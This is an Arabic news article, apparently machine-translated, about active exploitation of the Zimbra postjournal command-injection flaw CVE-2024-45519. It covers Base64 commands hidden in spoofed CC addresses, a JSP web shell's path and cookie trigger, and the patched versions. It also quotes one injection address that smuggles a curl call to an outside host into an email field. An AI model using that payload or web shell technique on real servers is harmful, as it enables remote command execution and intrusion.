يحذر الباحثون من الهجمات المستمرة التي تستغل الخلل الخطير في Zimbra Postjournal
ثغرة أمنية خطيرة في خدمة Zimbra لما بعد اليومية والتي يمكن أن تمكن المهاجمين غير المصادقين من تنفيذ أوامر عشوائية على التثبيتات المتأثرة
يحذر باحثو الأمن السيبراني من محاولات الاستغلال النشطة التي تستهدف ثغرة أمنية تم الكشف عنها حديثًا في Zimbra Collaboration التابعة لشركة Synacor.
وقالت شركة Proofpoint لأمن المؤسسات، إنها بدأت في مراقبة النشاط اعتبارًا من 28 سبتمبر 2024. وتسعى الهجمات إلى استغلال CVE-2024-45519، ثغرة أمنية خطيرة في خدمة Zimbra لما بعد اليومية والتي يمكن أن تمكن المهاجمين غير المصادقين من تنفيذ أوامر عشوائية على التثبيتات المتأثرة.
“تم إرسال رسائل البريد الإلكتروني التي تنتحل Gmail إلى عناوين زائفة في حقول CC في محاولة لخوادم Zimbra لتحليلها وتنفيذها كأوامر،” Proofpoint قال في سلسلة من المنشورات على X. “تحتوي العناوين على سلاسل Base64 التي يتم تنفيذها باستخدام الأداة المساعدة sh.”
تمت معالجة هذه المشكلة الحاسمة بواسطة Zimbra في الإصدارات 8.8.15 التصحيح 46، 9.0.0 التصحيح 41، 10.0.9، و10.1.1 تم إصداره في 4 سبتمبر 2024. يُنسب إلى باحث أمني يُدعى lebr0nli (Alan Li) اكتشاف الخلل والإبلاغ عنه.
“على الرغم من أن ميزة ما بعد اليومية قد تكون اختيارية أو غير ممكنة في معظم الأنظمة، إلا أنه لا يزال من الضروري تطبيق التصحيح المقدم لمنع الاستغلال المحتمل،” أشيش كاتاريا، مهندس معماري أمني في Synacor، ذُكر في تعليق بتاريخ 19 سبتمبر 2024.
“بالنسبة لأنظمة Zimbra حيث لم يتم تمكين ميزة ما بعد اليومية ولا يمكن تطبيق التصحيح على الفور، يمكن اعتبار إزالة ثنائي ما بعد اليومية كإجراء مؤقت حتى يمكن تطبيق التصحيح.”
قالت Proofpoint إنها حددت سلسلة من عناوين CC، والتي عند فك تشفيرها، تحاول كتابة غلاف ويب على خادم Zimbra الضعيف في الموقع: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”
يستمع هيكل الويب المثبت لاحقًا إلى الاتصال الداخلي باستخدام حقل ملف تعريف الارتباط JSESSIONID المحدد مسبقًا، وإذا كان موجودًا، فإنه يتابع تحليل ملف تعريف الارتباط JACTION لأوامر Base64.
يأتي غلاف الويب مزودًا بدعم تنفيذ الأوامر عبر exec. وبدلاً من ذلك، يمكنه أيضًا تنزيل ملف وتنفيذه عبر اتصال مأخذ توصيل. لم تُنسب الهجمات إلى جهة تهديد أو مجموعة معروفة حتى وقت كتابة هذه السطور.
ومع ذلك، يبدو أن نشاط الاستغلال قد بدأ بعد يوم واحد من نشر Project Discovery التفاصيل الفنية للخلل، والذي قال إنه “ينبع من إدخال المستخدم غير المعقم الذي يتم تمريره إليه بوبين في الإصدار غير المصحح، مما يمكّن المهاجمين من إدخال أوامر عشوائية.”
قالت شركة الأمن السيبراني إن المشكلة متجذرة في الطريقة التي يتعامل بها برنامج postjournal الثنائي المستند إلى C مع عناوين البريد الإلكتروني للمستلمين ويوزعها في وظيفة تسمى “msg_handler()”، مما يسمح بإدخال الأوامر في الخدمة التي تعمل على المنفذ 10027 عند تمرير SMTP معد خصيصًا رسالة بعنوان مزيف (على سبيل المثال، “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
في ضوء محاولات الاستغلال النشطة، يُنصح المستخدمون بشدة بتطبيق أحدث التصحيحات لتوفير الحماية المثلى ضد التهديدات المحتملة.
